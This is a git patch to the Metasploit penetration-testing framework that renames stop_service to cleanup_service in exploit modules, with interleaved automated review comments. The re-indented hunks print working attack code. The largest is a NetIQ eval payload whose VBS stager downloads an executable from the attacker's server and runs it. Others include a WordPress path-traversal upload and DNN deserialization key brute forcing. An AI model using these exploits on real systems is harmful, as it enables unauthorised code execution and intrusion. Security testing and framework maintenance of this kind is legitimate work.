From 9761d68c1942ad6cc87f010a7960a1bb0dd358db Mon Sep 17 00:00:00 2001 From: Ashley Donaldson Date: Thu, 10 Mar 2022 10:28:25 +1100 Subject: [PATCH] Rename stop_service to cleanup_service for services that use reference counting --- .../exploit/remote/http_server/php_include.rb | 2 +- .../admin/scada/yokogawa_bkbcopyd_client.rb | 2 +- .../gather/safari_file_url_navigation.rb | 2 +- modules/auxiliary/server/ldap.rb | 4 +- modules/exploits/linux/http/vestacp_exec.rb | 11 +- .../exploits/multi/http/jboss_maindeployer.rb | 2 +- .../multi/http/mutiny_subnetmask_exec.rb | 2 +- ...racle_weblogic_wsat_deserialization_rce.rb | 4 +- .../multi/http/ubiquiti_unifi_log4shell.rb | 4 +- .../exploits/multi/misc/java_jmx_server.rb | 107 +++++----- .../multi/wyse/hagent_untrusted_hsdata.rb | 4 +- .../exploits/unix/dhcp/bash_environment.rb | 2 +- .../rhel_dhcp_client_command_injection.rb | 2 +- .../webapp/google_proxystylesheet_exec.rb | 46 +++-- .../unix/webapp/wp_pixabay_images_upload.rb | 35 ++-- .../http/dnn_cookie_deserialization_rce.rb | 33 +-- .../exploits/windows/novell/netiq_pum_eval.rb | 191 +++++++++--------- 17 files changed, 236 insertions(+), 217 deletions(-) diff --git a/lib/msf/core/exploit/remote/http_server/php_include.rb b/lib/msf/core/exploit/remote/http_server/php_include.rb index 4f43082ef3..e1639489fb 100644 --- a/lib/msf/core/exploit/remote/http_server/php_include.rb +++ b/lib/msf/core/exploit/remote/http_server/php_include.rb @@ -62,7 +62,7 @@ module Exploit::Remote::HttpServer::PHPInclude rescue ::Interrupt raise $! ensure - stop_service + cleanup_service end end diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index cacab826ec..dc5b6dd187 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb 
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary end def on_client_close(c) - stop_service + cleanup_service end end diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index 5d50af6f9a..b52d1e6f8f 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -322,7 +322,7 @@ class MetasploitModule < Msf::Auxiliary super # Kill FTP - stop_service + cleanup_service # clear my resource, deregister ref, stop/close the HTTP socket begin diff --git a/modules/auxiliary/server/ldap.rb b/modules/auxiliary/server/ldap.rb index 02fe6b1fd0..8c51479825 100644 --- a/modules/auxiliary/server/ldap.rb +++ b/modules/auxiliary/server/ldap.rb @@ -39,15 +39,13 @@ class MetasploitModule < Msf::Auxiliary end # - # Wrapper for service execution and cleanup + # Wrapper for service execution # def run start_service service.wait rescue Rex::BindFailed => e print_error "Failed to bind to port #{datastore['SRVPORT']}: #{e.message}" - ensure - stop_service end # diff --git a/modules/exploits/linux/http/vestacp_exec.rb b/modules/exploits/linux/http/vestacp_exec.rb index d456423cc3..60ebad41bc 100644 --- a/modules/exploits/linux/http/vestacp_exec.rb +++ b/modules/exploits/linux/http/vestacp_exec.rb @@ -239,10 +239,13 @@ class MetasploitModule < Msf::Exploit::Remote def exploit start_http_server - payload_implant - login - start_backup_and_trigger_payload - stop_service + begin + payload_implant + login + start_backup_and_trigger_payload + ensure + cleanup_service + end end def on_request_uri(cli, _request) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 3b92a1d0e3..b69fea5a56 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb 
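Review bot: In modules/auxiliary/server/ldap.rb the `ensure`/`stop_service` pair under `run` is removed rather than renamed, so nothing in `run` itself releases the service when `service.wait` is interrupted; that is only correct if the module's `cleanup` (outside this hunk) calls `cleanup_service`, which the diff does not show. If it does, the new header comment should say so, e.g. `# Wrapper for service execution; the service is released by #cleanup`. If it does not, keep the `ensure` and replace `stop_service` with `cleanup_service` as the other hunks do.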
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Shutting down the web service...") - stop_service + cleanup_service # diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 5aac0531c5..eb62833a0a 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote #select(nil, nil, nil, 20) unless session_created? print_status("Shutting down the web service...") - stop_service + cleanup_service end # Handle incoming requests from the target diff --git a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb index 0905db5c06..b000e80db7 100644 --- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb +++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb @@ -166,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote # sleep 1 # waited += 1 # if waited > datastore['HTTP_DELAY'] - # stop_service + # cleanup_service # return Exploit::CheckCode::Safe # end # end # - # stop_service + # cleanup_service # return Exploit::CheckCode::Vulnerable # end diff --git a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb index 178647c60d..60e5f6d886 100644 --- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb +++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb @@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote wait_until { @search_received } @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.') ensure - stop_service + cleanup_service end def build_ldap_search_response_payload 
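Review bot: `cleanup_service` in jboss_maindeployer.rb (and likewise mutiny_subnetmask_exec.rb at @@ -150 and hagent_untrusted_hsdata.rb at @@ -195 and @@ -210) is called inline at the end of the happy path, unlike the other modules in this commit where it was moved into an `ensure`; any `fail_with` or exception earlier in `exploit` skips the release and leaves the reference held until the framework's module cleanup runs, assuming that cleanup releases it at all. For consistency with vestacp_exec.rb and google_proxystylesheet_exec.rb in the same patch, wrap the post-`start_service` body in `begin ... ensure cleanup_service end`. The enclosing `exploit` method starts outside this hunk.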
@@ -150,6 +150,6 @@ class MetasploitModule < Msf::Exploit::Remote wait_until { @search_received && (!handler_enabled? || session_created?) } handler ensure - cleanup + cleanup_service end end diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index 0001099426..9417bf0f26 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb 
@@ -131,60 +131,63 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Starting service...") start_service - @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" - connect - - print_status("Sending RMI Header...") - unless is_rmi? - fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") - end - - print_status("Discovering the JMXRMI endpoint...") - mbean_server = discover_endpoint - disconnect - if mbean_server.nil? - fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") - else - print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") - end - - # First try to connect to the original RHOST, since the mbean address may be inaccessible begin - connect(true, { 'RPORT' => mbean_server[:port] }) - rescue Rex::ConnectionError - # If that fails, try connecting to the listed address instead - connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] }) + @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" + connect + + print_status("Sending RMI Header...") + unless is_rmi? + fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") + end + + print_status("Discovering the JMXRMI endpoint...") + mbean_server = discover_endpoint + disconnect + if mbean_server.nil? + fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") + else + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + end + + # First try to connect to the original RHOST, since the mbean address may be inaccessible + begin + connect(true, { 'RPORT' => mbean_server[:port] }) + rescue Rex::ConnectionError + # If that fails, try connecting to the listed address instead + connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] }) + end + + unless is_rmi? 
+ fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") + end + + print_status("Proceeding with handshake...") + jmx_endpoint = handshake(mbean_server) + if jmx_endpoint.nil? + fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") + else + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + end + + print_status("Loading payload...") + unless load_payload(jmx_endpoint) + fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") + end + + print_status("Executing payload...") + send_jmx_invoke( + object_number: jmx_endpoint[:object_number], + uid_number: jmx_endpoint[:uid].number, + uid_time: jmx_endpoint[:uid].time, + uid_count: jmx_endpoint[:uid].count, + object: "#{@mlet}:name=jmxpayload,id=1", + method: 'run' + ) + disconnect + ensure + vprint_status("Stopping service...") + cleanup_service end - - unless is_rmi? - fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") - end - - print_status("Proceeding with handshake...") - jmx_endpoint = handshake(mbean_server) - if jmx_endpoint.nil? - fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") - else - print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") - end - - print_status("Loading payload...") - unless load_payload(jmx_endpoint) - fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") - end - - print_status("Executing payload...") - send_jmx_invoke( - object_number: jmx_endpoint[:object_number], - uid_number: jmx_endpoint[:uid].number, - uid_time: jmx_endpoint[:uid].time, - uid_count: jmx_endpoint[:uid].count, - object: "#{@mlet}:name=jmxpayload,id=1", - method: 'run' - ) - disconnect - vprint_status("Stopping service...") - stop_service end def is_rmi? 
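Review bot: The `disconnect` that closes the RMI socket is the last statement of the new `begin` body in java_jmx_server.rb, so it is skipped whenever `fail_with` raises after either `connect` call; the `ensure` only releases the HTTP service. Unless the Tcp mixin's `cleanup` (outside this hunk) disconnects for you, add `disconnect` ahead of `cleanup_service` in the `ensure` so the socket is closed on every exit path. The enclosing `exploit` method starts outside the hunk.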
diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 977f05d3e9..77926c5b90 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Timed out waiting on the HTTP request") wdmserver.close disconnect() - stop_service() + cleanup_service() return end @@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No executable sent :(") end - stop_service() + cleanup_service() wdmserver.close() handler diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index e18d382a78..6bc7e69d2a 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep 2 end ensure - stop_service + cleanup_service end end end diff --git a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb index 62f8598162..54113670f9 100644 --- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb +++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb @@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep 2 end ensure - stop_service + cleanup_service end end end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 3a7eef4f52..70f5be61fd 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb 
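Review bot: `cleanup_service()` in hagent_untrusted_hsdata.rb (both hunks, @@ -195 and @@ -210) keeps the empty parentheses from the old `stop_service()` call, while every other call site in this commit writes `cleanup_service`; Ruby style omits parentheses on argument-less calls, so drop them here too. The same hunks also carry `disconnect()` and `wdmserver.close()` with the same redundant parentheses, which could be normalised while the lines are being touched.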
@@ -114,29 +114,31 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...") start_service - print_status("Requesting a search using our custom XSLT...") - res = send_request_cgi({ - 'uri' => '/search', - 'vars_get' => - { - 'client' => m[2], - 'site' => m[1], - 'output' => 'xml_no_dtd', - 'q' => rand_text_alpha(rand(15)+1), - 'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml", - 'proxyreload' => '1' - } - }, 25) + begin + print_status("Requesting a search using our custom XSLT...") + res = send_request_cgi({ + 'uri' => '/search', + 'vars_get' => + { + 'client' => m[2], + 'site' => m[1], + 'output' => 'xml_no_dtd', + 'q' => rand_text_alpha(rand(15)+1), + 'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml", + 'proxyreload' => '1' + } + }, 25) - if (res) - print_status("The server returned: #{res.code} #{res.message}") - print_status("Waiting on the payload to execute...") - select(nil,nil,nil,20) - else - print_status("No response from the server") + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print_status("Waiting on the payload to execute...") + select(nil,nil,nil,20) + else + print_status("No response from the server") + end + ensure + print_status("Shutting down the web service...") + cleanup_service end - - print_status("Shutting down the web service...") - stop_service end end diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 3d8c501e29..8b3a25063a 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb 
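Review bot: The `ensure` branch in google_proxystylesheet_exec.rb prints `Shutting down the web service...` immediately before `cleanup_service`, but under the reference counting this commit is about, `cleanup_service` only releases this module's hold and the listener may stay up for other holders, so the message now overstates what happens. Reword it to what is actually done, e.g. `print_status("Releasing the web service...")`; the same wording appears in the `ensure` of netiq_pum_eval.rb (@@ -198) and as `Stopping service...` in java_jmx_server.rb (@@ -131).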
@@ -85,25 +85,28 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Starting up web service...") start_service - payload_uri = generate_payload_uri - vprint_status("Using URI #{payload_uri}") + begin + payload_uri = generate_payload_uri + vprint_status("Using URI #{payload_uri}") - random_file_name = rand_text_alphanumeric(rand(5) + 5) - post = { - 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5), - 'image_url' => payload_uri, - 'image_user' => rand_text_alphanumeric(rand(5) + 5), - 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" - } + random_file_name = rand_text_alphanumeric(rand(5) + 5) + post = { + 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5), + 'image_url' => payload_uri, + 'image_user' => rand_text_alphanumeric(rand(5) + 5), + 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" + } - print_status("Uploading payload #{random_file_name}...") - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(wordpress_url_backend), - 'vars_post' => post - }) + print_status("Uploading payload #{random_file_name}...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_backend), + 'vars_post' => post + }) - stop_service + ensure + cleanup_service + end unless res && res.code == 200 && res.headers['date'] fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...") diff --git a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb index 3203fba200..b10c3f3098 100644 --- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb +++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb 
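Review bot: The new `begin` body in wp_pixabay_images_upload.rb ends with a blank line directly before `ensure`, left over from the original spacing around `stop_service`; RuboCop's Layout/EmptyLinesAroundExceptionHandlingKeywords flags this, so drop the blank line. While the re-indented lines are being touched, `rand_text_alphanumeric(rand(5) + 5)` (three times) reads better as `rand_text_alphanumeric(rand(5..9))`.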
@@ -73,7 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => '2017-07-20', 'DefaultOptions' => { 'WfsDelay' => 5 }, - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -293,21 +298,23 @@ class MetasploitModule < Msf::Exploit::Remote print_warning('Trying all possible KEY and IV combinations...') print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...") start_service - vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...") + begin + vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...") - test_passphrases + test_passphrases - # If no working passphrase has been found, - # wait to allow the the chance for the last one to callback. - if @passphrase.empty? && !@dry_run - sleep(wfs_delay) - end - if service - stop_service + # If no working passphrase has been found, + # wait to allow the the chance for the last one to callback. + if @passphrase.empty? && !@dry_run + sleep(wfs_delay) + end + ensure + cleanup_service end + print "\r\n" if !@passphrase.empty? - print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found") + print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..]} found") end end end @@ -446,7 +453,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali print_good("Possible Base Key Value Found: #{key}") else print_good("KEY Found: #{key}") - print_good("IV Found: #{@passphrase[8..-1]}") + print_good("IV Found: #{@passphrase[8..]}") end vprint_status(format('Total number of Keys tried: %d', n_tried: i)) vprint_status(format('Time to crack: %.3f seconds', c_time: elapsed.to_s)) 
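Review bot: `'SideEffects' => []` in the Notes block added to dnn_cookie_deserialization_rce.rb does not match the module's behaviour: the hunk at @@ -293 below sends `@passphrases.count` test payloads to the target and starts an HTTP listener it expects the target to call back to, all of which lands in the target's web logs. `'SideEffects' => [IOC_IN_LOGS]` is the accurate value, and it is what defenders reading the module notes rely on.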
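Review bot: `@passphrase[8..]` on the last changed line of the @@ -293 hunk (and `[8..]` again at @@ -446 and @@ -577) is an endless-range rewrite of `[8..-1]` that has nothing to do with the `stop_service` rename; it is fine only if the framework's minimum Ruby is 2.6 or later, and it would be easier to review and bisect as its own commit. The old `if service` guard is also gone, so `cleanup_service` now runs unconditionally in the `ensure`; that is fine provided it tolerates a service that never came up, which the diff does not show.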
@@ -577,7 +584,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali @decryptor.key = key found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final # Find all possible IVs for the first ciphertext - brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1]) + brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..]) # Reduce IV set by testing against other ciphertexts cipher_texts.drop(1).each do |cipher_text| diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index d2266818b8..cf34b52cde 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb 
@@ -198,106 +198,109 @@ class MetasploitModule < Msf::Exploit::Remote 'Path' => resource_uri } }) - datastore['SSL'] = true + begin + datastore['SSL'] = true - # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/ - vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5)) - code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");" - code << "system(\"#{vbs_stage}.vbs\");" - register_file_for_cleanup("#{vbs_stage}.vbs") - register_file_for_cleanup("#{exename}.exe") - identity = "" + # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/ + vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5)) + code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << 
"system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");" + code << "system(\"#{vbs_stage}.vbs\");" + register_file_for_cleanup("#{vbs_stage}.vbs") + register_file_for_cleanup("#{exename}.exe") + identity = "" - data = "\x00\x00\x00\x00\x00\x01" - data << "\x00\x14" - data << "SPF.Util.callModuleA" - data << "\x00\x00" - data << "\x00" - data << "\x00\x02" - data << "\x0a\x0a" - data << "\x00\x00\x00\x01\x03" - data << "\x00\x03" - data << "pkt" - data << "\x03" - data << "\x00\x06" - data << "method" - data << "\x02" - data << "\x00\x04" - data << "eval" - data << "\x00\x06" - data << "module" - data << "\x02" - data << "\x00\x08" - data << "ldapagnt" - data << "\x00\x04" - data << "Eval" - data << "\x03" - data << "\x00\x07" - data << "content" - data << "\x02" - data << [code.length + 4].pack("n") - data << code - data << "\x0a\x0a1;\x0a\x0a1;" - data << "\x00\x00\x09" - data << "\x00\x00\x09" - data << "\x00\x03" - data << "uid" - data << "\x02" - data << [identity.length].pack("n") - data << identity - data << "\x00\x00\x09" - data << "\x00\x08" - data << "svc_name" - data << "\x02" - data << [svc_name.length].pack("n") - data << svc_name - data << "\x00\x00\x09" + data = "\x00\x00\x00\x00\x00\x01" + data << "\x00\x14" + data << "SPF.Util.callModuleA" + data << "\x00\x00" + data << "\x00" + data << "\x00\x02" + data << "\x0a\x0a" + data << "\x00\x00\x00\x01\x03" + data << "\x00\x03" + data << "pkt" + data << "\x03" + data << "\x00\x06" + data << "method" + data << "\x02" + data << "\x00\x04" + data << "eval" + data << "\x00\x06" + data << "module" + data << "\x02" + data << "\x00\x08" + data 
<< "ldapagnt" + data << "\x00\x04" + data << "Eval" + data << "\x03" + data << "\x00\x07" + data << "content" + data << "\x02" + data << [code.length + 4].pack("n") + data << code + data << "\x0a\x0a1;\x0a\x0a1;" + data << "\x00\x00\x09" + data << "\x00\x00\x09" + data << "\x00\x03" + data << "uid" + data << "\x02" + data << [identity.length].pack("n") + data << identity + data << "\x00\x00\x09" + data << "\x00\x08" + data << "svc_name" + data << "\x02" + data << [svc_name.length].pack("n") + data << svc_name + data << "\x00\x00\x09" - print_status("Sending the eval code request...") + print_status("Sending the eval code request...") - res = send_request_cgi( - { - 'uri' => '/', - 'version' => '1.1', - 'method' => 'POST', - 'ctype' => "application/x-amf", - 'headers' => { - "x-flash-version" => "11,4,402,278" - }, - 'data' => data, - } - ) + res = send_request_cgi( + { + 'uri' => '/', + 'version' => '1.1', + 'method' => 'POST', + 'ctype' => "application/x-amf", + 'headers' => { + "x-flash-version" => "11,4,402,278" + }, + 'data' => data, + } + ) - if res - fail_with(Failure::Unknown, "There was an unexpected response to the code eval request") - else - print_good("There wasn't a response, but this is the expected behavior...") - end - - # wait for the data to be sent - print_status("Waiting for the victim to request the EXE payload...") - - waited = 0 - while (not @exe_sent) - select(nil, nil, nil, 1) - waited += 1 - if (waited > datastore['HTTP_DELAY']) - fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?") + if res + fail_with(Failure::Unknown, "There was an unexpected response to the code eval request") + else + print_good("There wasn't a response, but this is the expected behavior...") end + + # wait for the data to be sent + print_status("Waiting for the victim to request the EXE payload...") + + waited = 0 + while (not @exe_sent) + select(nil, nil, nil, 1) + waited += 1 + if (waited > 
datastore['HTTP_DELAY']) + fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?") + end + end + + print_status("Giving time to the payload to execute...") + select(nil, nil, nil, 20) + + ensure + print_status("Shutting down the web service...") + cleanup_service end - - print_status("Giving time to the payload to execute...") - select(nil, nil, nil, 20) - - print_status("Shutting down the web service...") - stop_service end end
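Review bot: `datastore['SSL'] = true` is now the first statement of the `begin` body in netiq_pum_eval.rb but nothing in the new `ensure` restores it, so the module leaves the datastore mutated after `exploit` returns; presumably the flag is flipped so `send_request_cgi` reaches the target over TLS after the local HTTP server (started just above the hunk without it) is already up, in which case a re-run in the same module instance would start the server with SSL on. Capture the previous value before the `begin`, `ssl_was = datastore['SSL']`, and restore it in the `ensure` with `datastore['SSL'] = ssl_was` ahead of `cleanup_service`. `while (not @exe_sent)` on the re-indented polling loop is also non-idiomatic; `until @exe_sent` says the same thing. The enclosing `exploit` method starts outside the hunk.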